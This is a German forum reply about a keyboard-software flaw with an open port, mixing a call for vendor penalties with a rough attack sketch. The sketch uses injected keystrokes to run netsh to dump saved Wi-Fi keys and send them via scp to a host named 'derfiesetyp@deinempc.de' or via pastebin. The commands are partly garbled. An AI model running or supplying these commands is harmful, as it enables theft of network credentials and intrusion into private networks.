Grestorn schrieb:
Im Fall Deines Hausarztes müsste man sich schon im lokalen Netzes des Artzes befinden, um die Lücke nutzen zu können. Und wenn man das geschafft hat, ist die Lücke in der Tastatur-Software das geringste Problem.
Nunja, zunächst einmal muss der Schaden ja nicht erst entstehen, es reicht ja ein Verbot wie bspw. Saufen und Autofahren und Strafen bei Nichtbeachtung - bspw. ein 3-monatiges Vertriebsverbot der mit Schadhafter SW belasteten Produkte und ein "Verfall" des Kaufvertrages für die belasteten Kunden/Einzelhändler. Das würde wenigstens mal richtig weh tun, allerdings wirds wieder am "kleinen" ausgelassen werden wie ich unser Land kenne - sprich den unnötigen Arbeitsplätzen bspw...
So wie ich dej Artikel verstanden habe reicht aber doch schon eine Verbindung zu dem Nach-Außen offenen Port der SW, wieso sollte man dazu denn im Heimnetz sein müssen? Versteh' ich da was verkehrt?
Wenns denn "unbeobachtete" Eingaben annimmt könnte man ja "Win+R, cmd, Enter, netsh wlan show profiles" >hacker.txt
Danach netsh wlan show name="WIFINAME" key=clear >hacker.txt
cp %\hacker.txt
scp %/hacker.txt
derfiesetyp@deinempc.de:~/sonordner/mitdeinenWIFIdaten.txt
Dankesehr.
Alternativ von außen: Strg+A, Enter und woanders +v, bspw. auf "pastebin.org" via %DEFAULTBROWSER% +F2 "pastebin.org" TabTabTab StrgA TabTabEnter F2 StrgA
Ins cmd fenster zurück und auf seinem SSH Server die adresse als befehl pasten, sieht man ja dann im serverlog.
Es geht sicher einiges, so "Sicher" vor Angriffen würde ich mir da nicht sein wollen.
Sind natürlich falsche und flüchtige Beispiele, aber gehen tut vieles mit dem Kommandozeilenapparat. Auch sichtbar wird das ganze mit ein wenig Kenntnis sehr schnell.
Alles in allem vorbereitet mach ich das von daheim bspw. in unter 30Sekunden. Habe SSID/WPAKey und vollen Zugriff auf einen SSH Server+Clienten. das kann böse enden. RDP Incoming...